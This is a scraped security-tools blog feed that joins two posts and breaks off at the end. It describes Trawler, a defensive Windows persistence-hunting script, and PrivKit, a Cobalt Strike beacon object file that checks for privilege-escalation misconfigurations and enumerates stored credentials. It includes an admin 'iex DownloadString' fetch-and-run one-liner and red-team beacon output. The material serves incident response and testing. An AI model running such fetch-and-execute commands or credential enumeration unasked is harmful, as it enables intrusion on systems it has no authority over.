Persistence Mechanisms<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY9kq-VlmQ2IPwPbzUkWZkGRpKdmY0KHmM-OqvdIxCG5crNfC_iXNOeHyun8_ZtH2NaDqCfSd5kXcvUquqVBo88fJrRimXs3Jzj4KtynCFeV1x0RoApBDhAXFlpnt7HlS4muwO0R63pfdwuB62qCkarMamWPqJHR2Kj3lYSAGc8zL0Scs3dzhXnGT-nqSv/s2000/Trawler_1_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1668" data-original-width="2000" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY9kq-VlmQ2IPwPbzUkWZkGRpKdmY0KHmM-OqvdIxCG5crNfC_iXNOeHyun8_ZtH2NaDqCfSd5kXcvUquqVBo88fJrRimXs3Jzj4KtynCFeV1x0RoApBDhAXFlpnt7HlS4muwO0R63pfdwuB62qCkarMamWPqJHR2Kj3lYSAGc8zL0Scs3dzhXnGT-nqSv/w400-h334/Trawler_1_logo.png" width="400" /></a></div><p align="center" dir="auto"><br /></p>
<h1 align="center" dir="auto" tabindex="-1">
Dredging Windows for Persistence
</h1>
<h2 dir="auto" tabindex="-1">What is it?</h2>
<p dir="auto">Trawler is a PowerShell script designed to help Incident Responders discover potential <a href="https://www.kitploit.com/search/label/Indicators%20of%20Compromise" target="_blank" title="indicators of compromise">indicators of compromise</a> on Windows hosts, primarily focused on persistence mechanisms including Scheduled Tasks, Services, Registry Modifications, Startup Items, Binary Modifications and more.</p>
<p dir="auto">Currently, trawler can detect most of the persistence techniques specifically called out by MITRE and Atomic Red Team with more detections being added on a regular basis.</p><span><a name='more'></a></span><p dir="auto"><br /></p>
<h2 dir="auto" tabindex="-1">Main Features</h2>
<ul dir="auto">
<li>Scanning Windows OS for a variety of persistence techniques (Listed below)</li>
<li>CSV Output with MITRE Technique and Investigation Jumpstart Metadata</li>
<li>Analysis and Remediation Guidance Documentation (<a href="https://github.com/joeavanzato/Trawler/wiki/Analysis-and-Remediation-Guidance" rel="nofollow" target="_blank" title="https://github.com/joeavanzato/Trawler/wiki/Analysis-and-Remediation-Guidance">https://github.com/joeavanzato/Trawler/wiki/Analysis-and-Remediation-Guidance</a>)</li>
<li>Dynamic Risk Assignment for each detection</li>
<li>Built-in Allow Lists for common Windows configurations spanning Windows 10/Server 2012|2016|2019|2022 to reduce noise</li>
<li>Capture persistence metadata from 'golden' enterprise image for use as a dynamic allow-list at runtime</li>
<li>Analyze mounted disk images via drive re-targeting</li>
</ul>
<h2 dir="auto" tabindex="-1">How do I use it?</h2>
<p dir="auto">Just download and run trawler.ps1 from an Administrative PowerShell/cmd prompt - any detections will be displayed in the console as well as written to a CSV ('detections.csv') in the current working directory. The generated CSV will contain Detection Name, Source, Risk, Metadata and the relevant MITRE Technique.</p>
<p dir="auto">Or use this one-liner from an Administrative PowerShell terminal:</p>
<div><pre><code>iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/joeavanzato/Trawler/main/trawler.ps1'))<br /></code></pre></div>
<p dir="auto">Certain detections have allow-lists built-in to help remove noise from default Windows configurations (10/2016/2019/2022) - expected Scheduled Tasks, Services, etc. Of course, it is always possible for attackers to hijack these directly and masquerade with great detail as a default OS process - take care to use multiple forms of analysis and detection when dealing with skillful adversaries.</p>
<p dir="auto">If you have examples or ideas for additional detections, please feel free to submit an Issue or PR with relevant technical details/references - the code-base is a little messy right now and will be cleaned up over time.</p>
<p dir="auto">Additionally, if you identify obvious false positives, please let me know by opening an issue or PR on GitHub! The obvious culprits for this will be non-standard COMs, Services or Tasks.</p>
<h3 dir="auto" tabindex="-1">CLI Parameters</h3>
<div><pre><code>-scanoptions : Tab-through possible detections and select a sub-set using comma-delimited terms (eg. .\trawler.ps1 -scanoptions Services,Processes)<br />-hide : Suppress Detection output to console<br />-snapshot : Capture a "persistence snapshot" of the current system, defaulting to "$PSScriptRoot\snapshot.csv"<br />-snapshotpath : Define a custom file-path for saving snapshot output to.<br />-outpath : Define a custom file-path for saving detection output to (defaults to "$PSScriptRoot\detections.csv")<br />-loadsnapshot : Define the path for an existing snapshot file to load as an allow-list reference<br />-drivetarget : Define the variable for a mounted target drive (eg. .\trawler.ps1 -targetdrive "D:") - using this alone leads to an 'assumed homedrive' variable of C: for analysis purposes<br /></code></pre></div>
<h2 dir="auto" tabindex="-1">What separates this from PersistenceSniper?</h2>
<p dir="auto">PersistenceSniper is an awesome tool - I've used it heavily in the past - but there are a few key points that differentiate these utilities</p>
<ul dir="auto">
<li>trawler is (currently) a local utility - it would be pretty straight-forward to wrap it in a loop and use WinRM/PowerShell Sessions to execute it on remote hosts though</li>
<li>trawler implements allow-listing for many 'noisy' detections to help remove expected detections from default configurations of Windows (10/2016/2019/2022) and these are constantly being updated
<ul dir="auto">
<li>PersistenceSniper (for the most part) does not contain any type of allow-listing - therefore, there is more noise generated when considering items such as Services, Scheduled Tasks, general COM DLL scanning, etc.</li>
</ul>
</li>
<li>trawler's output is much more simplified - Name, Risk, Source, MITRE Technique and Metadata are the only items provided for each detection to help analysts jump-start their persistence hunting efforts</li>
<li>Regex is used in many checks to help detect 'suspicious' keywords or patterns in various critical areas including scanned file contents, registry values, etc.</li>
<li>trawler supports 'snapshotting' a system (for example, an enterprise golden image) then using the generated snapshot as an allow-list to reduce noise.</li>
<li>trawler supports 'drive-retargeting' to check dead-boxes mounted to an analysis machine.</li>
</ul>
<p dir="auto">Overall, these tools are extremely similar but approach the problem from slightly different angles - <a href="https://www.kitploit.com/search/label/PersistenceSniper" target="_blank" title="PersistenceSniper">PersistenceSniper</a> provides all information back to the analyst for review while Trawler tries to limit what is returned to only results that are likely to be potential adversary persistence mechanisms. As such, there is a possibility for false-negatives with trawler if an adversary completely mimics an allow-listed item.</p>
<h2 dir="auto" tabindex="-1">Tuning to your environment</h2>
<p dir="auto">Trawler supports loading an allow-list from a 'snapshot' - to do this requires two steps.</p>
<ol dir="auto">
<li>Run '.\trawler.ps1 -snapshot' on a "Golden Image" representing the servers in your environment - once complete, in addition to the standard 'detections.csv' a file named 'snapshots.csv' will be generated</li>
<li>This file can then be used as input to trawler when running on other hosts and the data will be loaded dynamically as an allow-list for each appropriate detection
<ol dir="auto">
<li>'.\trawler.ps1' -loadsnapshot "path\to\snapshot.csv"</li>
</ol>
</li>
</ol>
<p dir="auto">That's it - all relevant detections will then draw from the snapshot file as an allow-list to reduce noise and identify any potential changes to the base image that may have occurred.</p>
<p dir="auto">(Allow-listing is implemented for most of the checks but not all - still being actively implemented)</p>
<h2 dir="auto" tabindex="-1">Drive ReTargeting</h2>
<p dir="auto">Often during an investigation, analysts may end up mounting a new drive that represents an imaged Windows device - Trawler now partially supports scanning these mounted drives through the use of the '-drivetarget' parameter.</p>
<p dir="auto">At runtime, Trawler will re-target temporary script-level variables for use in checking file-based artifacts and also will attempt to load relevant Registry Hives (HKLM\SOFTWARE, HKLM\SYSTEM, NTUSER.DATs, USRCLASS.DATs) underneath HKLM/HKU and prefixed by 'ANALYSIS_'. Trawler will also attempt to unload these temporarily loaded hives upon script completion.</p>
<p dir="auto">As an example, if you have an image mounted at a location such as 'F:\Test' which contains the NTFS file system ('F:\Test\Windows', 'F:\Test\User', etc) then you can invoke trawler like below;</p>
<div><pre><code>.\trawler.ps1 -drivetarget "F:\Test"</code></pre></div>
<p dir="auto">Please note that since trawler attempts to load the registry hive files from the drive in question, mapping a UNC path to a live remote device will NOT work as those files will not be accessible due to system locks. I am working on an approach which will handle live remote devices, stay tuned.</p>
<h3 dir="auto" tabindex="-1">What is not inspected when drive retargeting?</h3>
<ul dir="auto">
<li>Running Processes</li>
<li>Network Connections</li>
<li>'Phantom' DLLs</li>
<li>WMI Consumers (Being worked on)</li>
<li>BITS Jobs (Being worked on)</li>
<li>Certificate Parsing (Being worked on)</li>
</ul>
<p dir="auto">Most other checks will function fine because they are based entirely on reading registry hives or file-based artifacts (or can be converted to do so, such as directly reading Task XML as opposed to using built-in command-lets.)</p>
<p dir="auto">Any limitations in checks when doing drive-retargeting will be discussed more fully in the GitHub Wiki.</p>
<h2 dir="auto" tabindex="-1">Example Images </h2>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP02RuSFcrJo4DP9qTjU6lmx5pLNxho6hA6GRckjuljDcP6DFx57IzrF7laCn7x7U4jj2Y7p8Us18NN9QH2G23FsrBYr4Q2Is2bPckI7Tx3nAsdutpu5WnUbnHWJurR3r06CsphpCWBNljKrJqJsRx7nm0tVVA_pbWpz-8D0doCs6-7qAWcGXQiyQYzkx5/s1679/Trawler_2_sample.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="402" data-original-width="1679" height="154" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP02RuSFcrJo4DP9qTjU6lmx5pLNxho6hA6GRckjuljDcP6DFx57IzrF7laCn7x7U4jj2Y7p8Us18NN9QH2G23FsrBYr4Q2Is2bPckI7Tx3nAsdutpu5WnUbnHWJurR3r06CsphpCWBNljKrJqJsRx7nm0tVVA_pbWpz-8D0doCs6-7qAWcGXQiyQYzkx5/w640-h154/Trawler_2_sample.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2msxdZAOo5ZZBZOgOl--fOKMnkCvOMVp1MpCOXaypAYhiZ05B6tUfKusjXWSLNeLGK8Le97KBs76h6WCAtIksR0zeXQj0Ck_8NDRb8YOjsC0oo15Z8NA-stWNsazL0gBaJ2PAOHac_-q63wDnQMljzao9HRXvaIlXQfUDadgv4GmBIfm8n8aMTTHeZsHs/s2286/Trawler_3_sample2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1200" data-original-width="2286" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2msxdZAOo5ZZBZOgOl--fOKMnkCvOMVp1MpCOXaypAYhiZ05B6tUfKusjXWSLNeLGK8Le97KBs76h6WCAtIksR0zeXQj0Ck_8NDRb8YOjsC0oo15Z8NA-stWNsazL0gBaJ2PAOHac_-q63wDnQMljzao9HRXvaIlXQfUDadgv4GmBIfm8n8aMTTHeZsHs/w640-h336/Trawler_3_sample2.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn7tF32cJFQ_6yXlKRDVdIBlFbkt9vJ0IHg52OW-79qFEJ6dlHah_eVhmHFVpMjgr7ls2UuF5uUsd__4LNwMzbTlZxYWnpcYRSzwImlfIyEiqlIYEabXnUGuuypp8pwGWNZi3SfGTMrVu0NztqBD15Q9fy9YWt0Kyscnh65ucxBYY6JZH4wfULqljQHJC9/s1853/Trawler_4_sample3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="299" data-original-width="1853" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn7tF32cJFQ_6yXlKRDVdIBlFbkt9vJ0IHg52OW-79qFEJ6dlHah_eVhmHFVpMjgr7ls2UuF5uUsd__4LNwMzbTlZxYWnpcYRSzwImlfIyEiqlIYEabXnUGuuypp8pwGWNZi3SfGTMrVu0NztqBD15Q9fy9YWt0Kyscnh65ucxBYY6JZH4wfULqljQHJC9/w640-h104/Trawler_4_sample3.png" width="640" /></a></div><p align="center" dir="auto"><span style="text-align: left;"> </span></p>
<h2 dir="auto" tabindex="-1">What is inspected?</h2>
<ul dir="auto">
<li>Scheduled Tasks</li>
<li>Users</li>
<li>Services</li>
<li>Running Processes</li>
<li>Network Connections</li>
<li>WMI Event Consumers (CommandLine/Script)</li>
<li>Startup Item Discovery</li>
<li>BITS Jobs Discovery</li>
<li>Windows Accessibility Feature Modifications</li>
<li>PowerShell Profile Existence</li>
<li>Office Addins from Trusted Locations</li>
<li>SilentProcessExit Monitoring</li>
<li>Winlogon Helper DLL Hijacking</li>
<li>Image File Execution Option Hijacking</li>
<li>RDP Shadowing</li>
<li>UAC Setting for Remote Sessions</li>
<li>Print Monitor DLLs</li>
<li>LSA Security and Authentication Package Hijacking</li>
<li>Time Provider DLLs</li>
<li>Print Processor DLLs</li>
<li>Boot/Logon Active Setup</li>
<li>User Initialization Logon Script Hijacking</li>
<li>ScreenSaver Executable Hijacking</li>
<li>Netsh DLLs</li>
<li>AppCert DLLs</li>
<li>AppInit DLLs</li>
<li>Application Shimming</li>
<li>COM Object Hijacking</li>
<li>LSA Notification Hijacking</li>
<li>'Office test' Usage</li>
<li>Office GlobalDotName Usage</li>
<li>Terminal Services DLL Hijacking</li>
<li>Autodial DLL Hijacking</li>
<li>Command AutoRun Processor Abuse</li>
<li>Outlook OTM Hijacking</li>
<li>Trust Provider Hijacking</li>
<li>LNK Target Scanning (Suspicious Terms, Multiple Extensions, Multiple EXEs)</li>
<li>'Phantom' Windows DLL Names loaded into running process (eg. un-signed WptsExtensions.dll)</li>
<li>Scanning Critical OS Directories for Unsigned EXEs/DLLs</li>
<li>Un-Quoted Service Path Hijacking</li>
<li>PATH Binary Hijacking</li>
<li>Common File Association Hijacks and Suspicious Keywords</li>
<li>Suspicious Certificate Hunting</li>
<li>GPO Script Discovery/Scanning</li>
<li>NLP Development Platform DLL Overrides</li>
<li>AeDebug/.NET/Script/Process/WER Debug Replacements</li>
<li>Explorer 'Load'</li>
<li>Windows Terminal startOnUserLogin Hijacks</li>
<li>App Path Mismatches</li>
<li>Service DLL/ImagePath Mismatches</li>
<li>GPO Extension DLLs</li>
<li>Potential COM Hijacks</li>
<li>Non-Standard LSA Extensions</li>
<li>DNSServerLevelPluginDll Presence</li>
<li>Explorer\MyComputer Utility Hijack</li>
<li>Terminal Services InitialProgram Check</li>
<li>RDP Startup Programs</li>
<li>Microsoft Telemetry Commands</li>
<li>Non-Standard AMSI Providers</li>
<li>Internet Settings LUI Error DLL</li>
<li>PeerDist\Extension DLL</li>
<li>ErrorHandler.CMD Checks</li>
<li>Built-In Diagnostics DLL</li>
<li>MiniDumpAuxiliary DLLs</li>
<li>KnownManagedDebugger DLLs</li>
<li>WOW64 Compatibility Layer DLLs</li>
<li>EventViewer MSC Hijack</li>
<li>Uninstall Strings Scan</li>
<li>PolicyManager DLLs</li>
<li>SEMgr Wallet DLL</li>
<li>WER Runtime Exception Handlers</li>
<li>HTML Help (.CHM)</li>
<li>Remote Access Tool Artifacts (Files, Directories, Registry Keys)</li>
<li>ContextMenuHandler DLL Checks</li>
<li>Office AI.exe Presence</li>
<li>Notepad++ Plugins</li>
<li>MSDTC Registry Hijacks</li>
<li>Narrator DLL Hijack (MSTTSLocEnUS.DLL)</li>
<li>Suspicious File Location Checks</li>
</ul>
<p dir="auto">TODO</p>
<ul dir="auto">
<li>Add Analysis/Remediation Guidance to each detection in the GitHub Wiki (In-Progress)</li>
<li>Browser <a href="https://www.kitploit.com/search/label/Extension%20Analysis" target="_blank" title="Extension Analysis">Extension Analysis</a> (?)</li>
<li>RID Hijacking [<a href="https://www.ired.team/offensive-security/persistence/rid-hijacking][https://pentestlab.blog/2020/02/12/persistence-rid-hijacking/" rel="nofollow" target="_blank" title="https://www.ired.team/offensive-security/persistence/rid-hijacking][https://pentestlab.blog/2020/02/12/persistence-rid-hijacking/">https://www.ired.team/offensive-security/persistence/rid-hijacking][https://pentestlab.blog/2020/02/12/persistence-rid-hijacking/</a>]</li>
<li>PowerAutomate Checks</li>
<li>ShadowPad Indicators [<a href="https://www.secureworks.com/research/shadowpad-malware-analysis" rel="nofollow" target="_blank" title="https://www.secureworks.com/research/shadowpad-malware-analysis">https://www.secureworks.com/research/shadowpad-malware-analysis</a>, <a href="https://www.hexacorn.com/blog/2023/02/25/beyond-good-ol-run-key-part-141/" rel="nofollow" target="_blank" title="https://www.hexacorn.com/blog/2023/02/25/beyond-good-ol-run-key-part-141/">https://www.hexacorn.com/blog/2023/02/25/beyond-good-ol-run-key-part-141/</a>]</li>
<li>OBS Startup Script Scanning [<a href="https://www.hexacorn.com/blog/2023/04/14/beyond-good-ol-run-key-part-142/" rel="nofollow" target="_blank" title="https://www.hexacorn.com/blog/2023/04/14/beyond-good-ol-run-key-part-142/">https://www.hexacorn.com/blog/2023/04/14/beyond-good-ol-run-key-part-142/</a>]</li>
<li>SQL <a href="https://www.kitploit.com/search/label/Server%20Management" target="_blank" title="Server Management">Server Management</a> Addins [<a href="https://www.hexacorn.com/blog/2019/09/28/beyond-good-ol-run-key-part-117/" rel="nofollow" target="_blank" title="https://www.hexacorn.com/blog/2019/09/28/beyond-good-ol-run-key-part-117/">https://www.hexacorn.com/blog/2019/09/28/beyond-good-ol-run-key-part-117/</a>]</li>
<li>AutoPlay Handler Inspection [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\Handlers]</li>
<li>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Pending\SPReviewEnabler</li>
<li>OCSetup [<a href="https://www.hexacorn.com/blog/2019/11/09/beyond-good-ol-run-key-part-122/" rel="nofollow" target="_blank" title="https://www.hexacorn.com/blog/2019/11/09/beyond-good-ol-run-key-part-122/">https://www.hexacorn.com/blog/2019/11/09/beyond-good-ol-run-key-part-122/</a>]</li>
<li>Review <a href="https://hijacklibs.net/#" rel="nofollow" target="_blank" title="https://hijacklibs.net/#">https://hijacklibs.net/#</a> for additional opportunities</li>
<li>Review <a href="https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows" rel="nofollow" target="_blank" title="https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows">https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows</a> for additional opportunities</li>
<li>Review <a href="https://silentrunners.org/launchpoints.html" rel="nofollow" target="_blank" title="https://silentrunners.org/launchpoints.html">https://silentrunners.org/launchpoints.html</a> for additional opportunities</li>
</ul>
<h2 dir="auto" tabindex="-1">MITRE Techniques Evaluated</h2>
<p dir="auto">Please be aware that some of these are (of course) more detected than others - for example, we are not detecting all possible registry modifications but rather inspecting certain keys for obvious changes and using the generic MITRE technique "Modify Registry" where no other technique is applicable. For other items such as COM hijacking, we are inspecting all entries in the relevant registry section, checking against 'known-good' patterns and bubbling up unknown or mismatched values, resulting in a much more complete detection surface for that particular technique.</p>
<ul dir="auto">
<li>T1037: Boot or Logon Initialization Scripts</li>
<li>T1037.001: Boot or Logon Initialization Scripts: Logon Script (Windows)</li>
<li>T1037.005: Boot or Logon Initialization Scripts: Startup Items</li>
<li>T1055.001: Process Injection: Dynamic-link Library Injection</li>
<li>T1059: Command and Scripting Interpreter</li>
<li>T1071: Application Layer Protocol</li>
<li>T1098: Account Manipulation</li>
<li>T1112: Modify Registry</li>
<li>T1053: Scheduled Task/Job</li>
<li>T1136: Create Account</li>
<li>T1137.001: Office Application Office Template Macros</li>
<li>T1137.002: Office Application Startup: Office Test</li>
<li>T1137.006: Office Application Startup: Add-ins</li>
<li>T1197: BITS Jobs</li>
<li>T1505.005: Server Software Component: Terminal Services DLL</li>
<li>T1543.003: Create or Modify System Process: Windows Service</li>
<li>T1546: Event Triggered Execution</li>
<li>T1546.001: Event Triggered Execution: Change Default File Association</li>
<li>T1546.002: Event Triggered Execution: Screensaver</li>
<li>T1546.003: Event Triggered Execution: Windows Management <a href="https://www.kitploit.com/search/label/Instrumentation" target="_blank" title="Instrumentation">Instrumentation</a> Event Subscription</li>
<li>T1546.007: Event Triggered Execution: Netsh Helper DLL</li>
<li>T1546.008: Event Triggered Execution: Accessibility Features</li>
<li>T1546.009: Event Triggered Execution: AppCert DLLs</li>
<li>T1546.010: Event Triggered Execution: AppInit DLLs</li>
<li>T1546.011: Event Triggered Execution: Application Shimming</li>
<li>T1546.012: Event Triggered Execution: Image File Execution Options Injection</li>
<li>T1546.013: Event Triggered Execution: PowerShell Profile</li>
<li>T1546.015: Event Triggered Execution: Component Object Model Hijacking</li>
<li>T1547.002: Boot or Logon Autostart Execution: Authentication Packages</li>
<li>T1547.003: Boot or Logon Autostart Execution: Time Providers</li>
<li>T1547.004: Boot or Logon Autostart Execution: Winlogon Helper DLL</li>
<li>T1547.005: Boot or Logon Autostart Execution: Security Support Provider</li>
<li>T1547.009: Boot or Logon Autostart Execution: Shortcut Modification</li>
<li>T1547.012: Boot or Logon Autostart Execution: Print Processors</li>
<li>T1547.014: Boot or Logon Autostart Execution: Active Setup</li>
<li>T1553: Subvert Trust Controls</li>
<li>T1553.004: Subvert Trust Controls: Install Root Certificate</li>
<li>T1556.002: Modify Authentication Process: Password Filter DLL</li>
<li>T1574: Hijack Execution Flow</li>
<li>T1574.007: Hijack Execution Flow: Path Interception by PATH Environment Variable</li>
<li>T1574.009: Hijack Execution Flow: Path Interception by Unquoted Path</li>
</ul>
<h2 dir="auto" tabindex="-1">References</h2>
<p dir="auto">This tool would not exist without the amazing InfoSec community - the most notable references I used are provided below.</p>
<ul dir="auto">
<li><a href="https://github.com/last-byte/PersistenceSniper" rel="nofollow" target="_blank" title="PersistenceSniper">PersistenceSniper</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0003/" rel="nofollow" target="_blank" title="MITRE ATT&CK">MITRE ATT&CK</a></li>
<li><a href="https://persistence-info.github.io/" rel="nofollow" target="_blank" title="Persistence Info GitHub">Persistence Info GitHub</a></li>
<li><a href="https://www.hexacorn.com/blog/2017/01/28/beyond-good-ol-run-key-all-parts/" rel="nofollow" target="_blank" title="Hexacorn - Persistence Series">Hexacorn - Persistence Series</a></li>
<li><a href="https://www.ired.team/" rel="nofollow" target="_blank" title="IRED">IRED</a></li>
<li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings" rel="nofollow" target="_blank" title="PayloadsAllTheThings">PayloadsAllTheThings</a></li>
</ul>
<h2 dir="auto" tabindex="-1">More References</h2>
<ul dir="auto">
<li><a href="https://twitter.com/Laughing_Mantis/status/1645268114966470662" rel="nofollow" target="_blank" title="https://twitter.com/Laughing_Mantis/status/1645268114966470662">https://twitter.com/Laughing_Mantis/status/1645268114966470662</a></li>
<li><a href="https://shellz.club/posts/a-novel-method-for-bypass-ETW/" rel="nofollow" target="_blank" title="https://shellz.club/posts/a-novel-method-for-bypass-ETW/">https://shellz.club/posts/a-novel-method-for-bypass-ETW/</a></li>
<li><a href="https://pentestlab.blog/2023/03/20/persistence-service-control-manager/" rel="nofollow" target="_blank" title="https://pentestlab.blog/2023/03/20/persistence-service-control-manager/">https://pentestlab.blog/2023/03/20/persistence-service-control-manager/</a></li>
<li><a href="https://ristbs.github.io/2023/02/15/hijack-explorer-context-menu-for-persistence-and-fun.html" rel="nofollow" target="_blank" title="https://ristbs.github.io/2023/02/15/hijack-explorer-context-menu-for-persistence-and-fun.html">https://ristbs.github.io/2023/02/15/hijack-explorer-context-menu-for-persistence-and-fun.html</a></li>
<li><a href="https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/" rel="nofollow" target="_blank" title="https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/">https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/</a></li>
</ul>
<br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/joeavanzato/Trawler" rel="nofollow" target="_blank" title="Download Trawler">Download Trawler</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-69062264559153536752023-08-03T08:30:00.003-04:002023-08-03T08:30:00.134-04:00PrivKit - Simple Beacon Object File That Detects Privilege Escalation Vulnerabilities Caused By Misconfigurations On Windows OS<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhUuZJSO5HgKHDxtpT1g2u_BQda5hzIsSp1YjJULHZCocCr-A3VoEJ1VTFcqtVvv2BvPxPT3KescAdRA2bRwV93-Ri9DnmpSBpipFvc_mLkSZze8xSPPhhBblfTvkf30ne1vJ8w6XN1qJb3r08Uf5ycfFaSpBUvwDdLxlUKMuqQbKmDPkSEwSRHESTCS_kn"><img alt="" border="0" height="302" id="BLOGGER_PHOTO_ID_7262933010865800850" src="https://blogger.googleusercontent.com/img/a/AVvXsEhUuZJSO5HgKHDxtpT1g2u_BQda5hzIsSp1YjJULHZCocCr-A3VoEJ1VTFcqtVvv2BvPxPT3KescAdRA2bRwV93-Ri9DnmpSBpipFvc_mLkSZze8xSPPhhBblfTvkf30ne1vJ8w6XN1qJb3r08Uf5ycfFaSpBUvwDdLxlUKMuqQbKmDPkSEwSRHESTCS_kn=w640-h302" width="640" /></a></p><br /> <p dir="auto">PrivKit is a simple beacon object file that detects <a href="https://www.kitploit.com/search/label/Privilege%20Escalation" target="_blank" title="privilege escalation">privilege escalation</a> <a href="https://www.kitploit.com/search/label/vulnerabilities" target="_blank" title="vulnerabilities">vulnerabilities</a> caused by <a href="https://www.kitploit.com/search/label/Misconfigurations" target="_blank" title="misconfigurations">misconfigurations</a> on Windows OS.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">PrivKit detects following misconfigurations</h2> <div><pre><code> Checks for Unquoted Service Paths<br /> Checks for Autologon Registry Keys<br /> Checks for Always Install Elevated Registry Keys<br /> Checks for Modifiable Autoruns<br /> Checks for Hijackable Paths<br /> Enumerates <a href="https://www.kitploit.com/search/label/Credentials" target="_blank" title="Credentials">Credentials</a> From Credential Manager<br /> Looks for current Token Privileges<br /></code></pre></div> <h2 dir="auto" tabindex="-1">Usage</h2> <div><pre><code>[03/20 00:51:06] beacon> privcheck<br />[03/20 00:51:06] [*] Priv Esc Check Bof by @merterpreter<br />[03/20 00:51:06] [*] Checking For Unquoted Service Paths..<br />[03/20 00:51:06] [*] Checking For Autologon Registry Keys..<br />[03/20 00:51:06] [*] Checking For Always Install Elevated Registry Keys..<br />[03/20 00:51:06] [*] Checking For Modifiable Autoruns..<br />[03/20 00:51:06] [*] Checking For Hijackable Paths..<br />[03/20 00:51:06] [*] Enumerating Credentials From Credential Manager..<br />[03/20 00:51:06] [*] Checking For Token Privileges..<br />[03/20 00:51:06] [+] host called home, sent: 10485 bytes<br />[03/20 00:51:06] [+] received output:<br />Unquoted Service Path Check Result: Vulnerable service path found: c:\program files (x86)\grasssoft\macro expert\MacroService.exe<br /></code></pre></div> <p dir="auto">Simply load the cna file and type "privcheck"<br /> If you want to compile by yourself you can use:<br /> <code>make all</code><br /> or <br /> <code>x86_64-w64-mingw32-gcc -c cfile.c -o ofile.o</code></p> <p dir="auto">If you want to look for just one misconf you can use object file with "inline-execute" for example<br /> <code> inline-execute /path/tokenprivileges.o</code></p> <p dir="auto" style="text-align: center;"><a href="https://user-images.githubusercontent.com/48562581/226249192-84da03d5-435a-4da0-a6e6-4c451d2403e4.PNG" rel="nofollow" target="_blank" title="PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS. (5)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhUuZJSO5HgKHDxtpT1g2u_BQda5hzIsSp1YjJULHZCocCr-A3VoEJ1VTFcqtVvv2BvPxPT3KescAdRA2bRwV93-Ri9DnmpSBpipFvc_mLkSZze8xSPPhhBblfTvkf30ne1vJ8w6XN1qJb3r08Uf5ycfFaSpBUvwDdLxlUKMuqQbKmDPkSEwSRHESTCS_kn"><img alt="" border="0" height="302" id="BLOGGER_PHOTO_ID_7262933010865800850" src="https://blogger.googleusercontent.com/img/a/AVvXsEhUuZJSO5HgKHDxtpT1g2u_BQda5hzIsSp1YjJULHZCocCr-A3VoEJ1VTFcqtVvv2BvPxPT3KescAdRA2bRwV93-Ri9DnmpSBpipFvc_mLkSZze8xSPPhhBblfTvkf30ne1vJ8w6XN1qJb3r08Uf5ycfFaSpBUvwDdLxlUKMuqQbKmDPkSEwSRHESTCS_kn=w640-h302" width="640" /></a></p> <p dir="auto" style="text-align: center;"><a href="https://user-images.githubusercontent.com/48562581/226249135-a2444998-8c4f-4783-9b60-726c887032e4.PNG" rel="nofollow" target="_blank" title="PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS. (6)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj5hd-qQTYGFw52FgK_0pVKkdyxGBQocZIkTtOUXRXEhAHM59uJYWVSOj1si9k3ADcVopYAcmEP7WVDfYKppTLgGmxSCDtj6XFVgYpgnUXu-ZtVxvlnmMwtQD7YE3NA1IhT-AmiK7OuwN38LgzMogCtYHXJljW-WtOk3-eN7t29m8E8On8mX1Fi9wdobpMW"><img alt="" border="0" height="322" id="BLOGGER_PHOTO_ID_7262933027784488050" src="https://blogger.googleusercontent.com/img/a/AVvXsEj5hd-qQTYGFw52FgK_0pVKkdyxGBQocZIkTtOUXRXEhAHM59uJYWVSOj1si9k3ADcVopYAcmEP7WVDfYKppTLgGmxSCDtj6XFVgYpgnUXu-ZtVxvlnmMwtQD7YE3NA1IhT-AmiK7OuwN38LgzMogCtYHXJljW-WtOk3-eN7t29m8E8On8mX1Fi9wdobpMW=w640-h322" width="640" /></a></p> <h2 dir="auto" tabindex="-1">Acknowledgement</h2> <p dir="auto">Mr.Un1K0d3r - Offensive Coding Portal <br /> <a href="https://mr.un1k0d3r.world/portal/" rel="nofollow" target="_blank" title="https://mr.un1k0d3r.world/portal/">https://mr.un1k0d3r.world/portal/</a></p> <p dir="auto">Outflank - C2-Tool-Collection<br /> <a href="https://github.com/outflanknl/C2-Tool-Collection" rel="nofollow" target="_blank" title="https://github.com/outflanknl/C2-Tool-Collection">https://github.com/outflanknl/C2-Tool-Collection</a></p> <p 